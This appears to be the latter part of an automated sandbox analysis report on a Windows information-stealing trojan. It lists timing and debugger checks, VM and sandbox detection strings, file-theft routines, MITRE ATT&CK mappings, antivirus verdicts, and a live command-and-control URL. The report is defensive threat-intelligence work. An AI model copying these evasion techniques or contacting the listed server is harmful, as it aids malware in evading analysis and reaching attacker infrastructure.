Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1366F57 second address: 1366F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13670E3 second address: 13670EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13678CF second address: 13678D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13678D4 second address: 13678E2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jbe 00007F8ED0E3C3D6h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137BF8B second address: 137BFC9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8ED0C920C6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F8ED0C920D2h 0x00000011 pushad 0x00000012 jo 00007F8ED0C920C6h 0x00000018 push eax 0x00000019 pop eax 0x0000001a popad 0x0000001b jl 00007F8ED0C920CCh 0x00000021 ja 00007F8ED0C920C6h 0x00000027 popad 0x00000028 pushad 0x00000029 js 00007F8ED0C920CCh 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137BFC9 second address: 137BFFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8ED0E3C3FEh 0x0000000a jmp 00007F8ED0E3C3E5h 0x0000000f jmp 00007F8ED0E3C3E3h 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137BFFF second address: 137C012 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920CFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 137C012 second address: 137C01B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 138CE24 second address: 138CE33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920CAh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 138CE33 second address: 138CE39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 138CE39 second address: 138CE5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 js 00007F8ED0C920DEh 0x0000000d push eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 jnp 00007F8ED0C920D2h 0x00000019 je 00007F8ED0C920C6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139CEFC second address: 139CF02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139CF02 second address: 139CF1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8ED0C920D7h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139CF1F second address: 139CF57 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8ED0E3C3F4h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F8ED0E3C3DEh 0x00000012 jns 00007F8ED0E3C3D6h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139CF57 second address: 139CF5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139D265 second address: 139D26B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139D26B second address: 139D26F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139D26F second address: 139D273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139D273 second address: 139D28A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8ED0C920CEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139D28A second address: 139D290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139D290 second address: 139D295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139D295 second address: 139D2B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F8ED0E3C3D6h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 jc 00007F8ED0E3C3D6h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139D2B3 second address: 139D2BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139D2BC second address: 139D2C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139D405 second address: 139D40C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139DA24 second address: 139DA2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139DA2F second address: 139DA33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139DA33 second address: 139DA4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F8ED0E3C3E1h 0x0000000c pop edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139DA4F second address: 139DA7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push edx 0x00000007 jc 00007F8ED0C920DEh 0x0000000d jmp 00007F8ED0C920D8h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139DA7A second address: 139DA7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139DD8B second address: 139DDA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F8ED0C920D4h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 139DEFF second address: 139DF05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13A0BA0 second address: 13A0BA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13A0BA4 second address: 13A0BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F8ED0E3C3D6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13A0BB2 second address: 13A0BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13A0BB6 second address: 13A0BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jo 00007F8ED0E3C3ECh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8ED0E3C3DEh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13A0E81 second address: 13A0E87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13A0E87 second address: 13A0E96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13A238F second address: 13A23B5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8ED0C920E1h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13A404A second address: 13A4052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13A4052 second address: 13A4057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 580058E second address: 58005A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8ED0E3C3E5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12B6D6A second address: 12B6D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 10FD832 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 10FD934 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 12AC62F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 12D6710 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 12BE9D4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 13415A4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Evaded block: after key decision (graph_0-38704)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E240F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00E240F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E1E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_00E1E530
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E247C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00E247C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E1F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00E1F7B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E11710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00E11710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E1DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_00E1DB80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E24B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00E24B60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E23B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00E23B00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E1BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_00E1BE40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E1EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_00E1EE20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E1DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00E1DF10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E11160 GetSystemInfo,ExitProcess, 0_2_00E11160
Source: file.exe, file.exe, 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1391285301.0000000001AE4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW.{Q0
Source: file.exe, 00000000.00000002.1391285301.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1391285301.0000000001AB4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1391285301.0000000001AE4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1391285301.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwares
Source: file.exe, 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node (graph_0-37571)
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node (graph_0-37517)
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node (graph_0-37520)
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node (graph_0-37538)
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node (graph_0-37531)
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node (graph_0-37405)
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

                Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E14610 VirtualProtect ?,00000004,00000100,00000000 0_2_00E14610
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E29BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00E29BB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E29AA0 mov eax, dword ptr fs:[00000030h] 0_2_00E29AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E27690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA, 0_2_00E27690
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match; File source: Process Memory Space: file.exe PID: 7328, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E29790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00E29790
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E298E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle, 0_2_00E298E0
Source: file.exe, file.exe, 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: RProgram Manager
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E575A8 cpuid 0_2_00E575A8
Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00E27D20
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E26BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess, 0_2_00E26BC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E279E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00E279E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E27BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00E27BC0

                Stealing of Sensitive Information

Source: Yara match; File source: 0.2.file.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000002.1391285301.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.1350066957.0000000005670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: file.exe PID: 7328, type: MEMORYSTR
Source: Yara match; File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match; File source: 0.2.file.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000002.1391285301.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.1350066957.0000000005670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: file.exe PID: 7328, type: MEMORYSTR
Source: Yara match; File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (a number before a technique name is the count of matched signatures for that technique)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 12 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 4 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 334 System Information Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Source | Detection | Scanner | Label | Link
file.exe | 39% | ReversingLabs | Win32.Trojan.Generic |
file.exe | 41% | Virustotal | | Browse
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label | Link
https://docs.rs/getrandom#nodejs-es-module-support | 0% | URL Reputation | safe |
http://185.215.113.206/6c4adf523b719729.php | 17% | Virustotal | | Browse
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/6c4adf523b719729.php | true | | unknown
http://185.215.113.206/ | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/6c4adf523b719729.php=6u2 | file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.php~ | file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.phpl | file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.php// | file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.phpU5 | file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://docs.rs/getrandom#nodejs-es-module-support | file.exe, file.exe, 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1350066957.000000000569B000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://185.215.113.206/6c4adf523b719729.phpq5 | file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.1391285301.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.206/6c4adf523b719729.phpI5 | file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/& | file.exe, 00000000.00000002.1391285301.0000000001ACA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206RG | file.exe, 00000000.00000002.1391285301.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1543580
                                      Start date and time:2024-10-28 07:17:15 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 5m 48s
